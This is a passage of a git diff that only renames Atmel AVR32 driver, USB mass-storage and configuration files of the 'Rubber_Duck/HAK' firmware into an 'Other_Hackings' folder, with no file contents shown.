Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/intc/intc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/pm.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/pm.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/pm.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/pm.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/pm.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/pm.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/pm.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/pm.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/pm_conf_clocks.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/pm_conf_clocks.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/pm_conf_clocks.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/pm_conf_clocks.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/power_clocks_lib.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/power_clocks_lib.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/power_clocks_lib.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/power_clocks_lib.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/power_clocks_lib.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/power_clocks_lib.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/power_clocks_lib.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/power_clocks_lib.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/sleep.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/sleep.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/sleep.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/pm/sleep.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/spi/spi.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/spi/spi.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/spi/spi.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/spi/spi.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/spi/spi.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/spi/spi.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/spi/spi.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/spi/spi.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/usbb/usbb_device.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/usbb/usbb_device.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/usbb/usbb_device.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/usbb/usbb_device.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/usbb/usbb_device.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/usbb/usbb_device.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/usbb/usbb_device.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/usbb/usbb_device.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/usbb/usbb_otg.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/usbb/usbb_otg.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/usbb/usbb_otg.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/usbb/usbb_otg.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/compiler.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/compiler.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/compiler.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/compiler.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/header_files/uc3d_defines_fix.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/header_files/uc3d_defines_fix.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/header_files/uc3d_defines_fix.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/header_files/uc3d_defines_fix.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/linker_scripts/at32uc3b/0256/gcc/link_uc3b0256.lds b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/linker_scripts/at32uc3b/0256/gcc/link_uc3b0256.lds similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/linker_scripts/at32uc3b/0256/gcc/link_uc3b0256.lds rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/linker_scripts/at32uc3b/0256/gcc/link_uc3b0256.lds diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/parts.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/parts.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/parts.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/parts.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/preprocessor/mrepeat.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/preprocessor/mrepeat.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/preprocessor/mrepeat.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/preprocessor/mrepeat.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/preprocessor/preprocessor.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/preprocessor/preprocessor.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/preprocessor/preprocessor.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/preprocessor/preprocessor.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/preprocessor/stringz.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/preprocessor/stringz.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/preprocessor/stringz.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/preprocessor/stringz.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/preprocessor/tpaste.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/preprocessor/tpaste.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/preprocessor/tpaste.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/preprocessor/tpaste.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/startup/startup_uc3.S b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/startup/startup_uc3.S similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/startup/startup_uc3.S rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/startup/startup_uc3.S diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/startup/trampoline_uc3.S b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/startup/trampoline_uc3.S similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/startup/trampoline_uc3.S rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/startup/trampoline_uc3.S diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/startup/trampoline_uc3.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/startup/trampoline_uc3.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/startup/trampoline_uc3.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/startup/trampoline_uc3.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/status_codes.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/status_codes.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/status_codes.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/utils/status_codes.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/boards/board.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/boards/board.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/boards/board.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/boards/board.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/genclk.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/genclk.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/genclk.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/genclk.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/osc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/osc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/osc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/osc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/pll.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/pll.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/pll.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/pll.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/sysclk.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/sysclk.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/sysclk.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/sysclk.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/genclk.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/genclk.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/genclk.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/genclk.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/osc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/osc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/osc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/osc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/pll.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/pll.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/pll.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/pll.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/sysclk.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/sysclk.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/sysclk.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/sysclk.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/sysclk.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/sysclk.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/sysclk.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/clock/uc3b0_b1/sysclk.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/sleepmgr/sleepmgr.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/sleepmgr/sleepmgr.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/sleepmgr/sleepmgr.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/sleepmgr/sleepmgr.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/sleepmgr/uc3/sleepmgr.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/sleepmgr/uc3/sleepmgr.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/sleepmgr/uc3/sleepmgr.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/sleepmgr/uc3/sleepmgr.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/sleepmgr/uc3/sleepmgr.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/sleepmgr/uc3/sleepmgr.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/sleepmgr/uc3/sleepmgr.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/sleepmgr/uc3/sleepmgr.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/storage/ctrl_access/ctrl_access.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/storage/ctrl_access/ctrl_access.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/storage/ctrl_access/ctrl_access.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/storage/ctrl_access/ctrl_access.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/storage/ctrl_access/ctrl_access.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/storage/ctrl_access/ctrl_access.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/storage/ctrl_access/ctrl_access.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/storage/ctrl_access/ctrl_access.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/device/udi_msc_conf.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/device/udi_msc_conf.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/device/udi_msc_conf.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/device/udi_msc_conf.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/device/udi_msc_desc.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/device/udi_msc_desc.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/device/udi_msc_desc.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/device/udi_msc_desc.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/sbc_protocol.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/sbc_protocol.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/sbc_protocol.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/sbc_protocol.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/spc_protocol.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/spc_protocol.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/spc_protocol.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/spc_protocol.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/usb_protocol_msc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/usb_protocol_msc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/usb_protocol_msc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/class/msc/usb_protocol_msc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udc.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udc.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udc.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udc.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udc_desc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udc_desc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udc_desc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udc_desc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udd.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udd.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udd.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udd.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udi.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udi.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udi.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/udc/udi.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/usb_atmel.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/usb_atmel.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/usb_atmel.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/usb_atmel.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/usb_protocol.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/usb_protocol.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/usb_protocol.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/services/usb/usb_protocol.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/utils/interrupt.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/utils/interrupt.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/utils/interrupt.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/utils/interrupt.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/utils/interrupt/interrupt_avr32.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/utils/interrupt/interrupt_avr32.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/utils/interrupt/interrupt_avr32.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/common/utils/interrupt/interrupt_avr32.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_access.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_access.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_access.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_access.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_board.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_board.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_board.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_board.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_clock.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_clock.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_clock.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_clock.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_sd_mmc_spi.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_sd_mmc_spi.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_sd_mmc_spi.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_sd_mmc_spi.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_sleepmgr.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_sleepmgr.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_sleepmgr.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_sleepmgr.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_usb.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_usb.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_usb.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/config/conf_usb.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/led.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/led.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/led.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/led.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/led.h 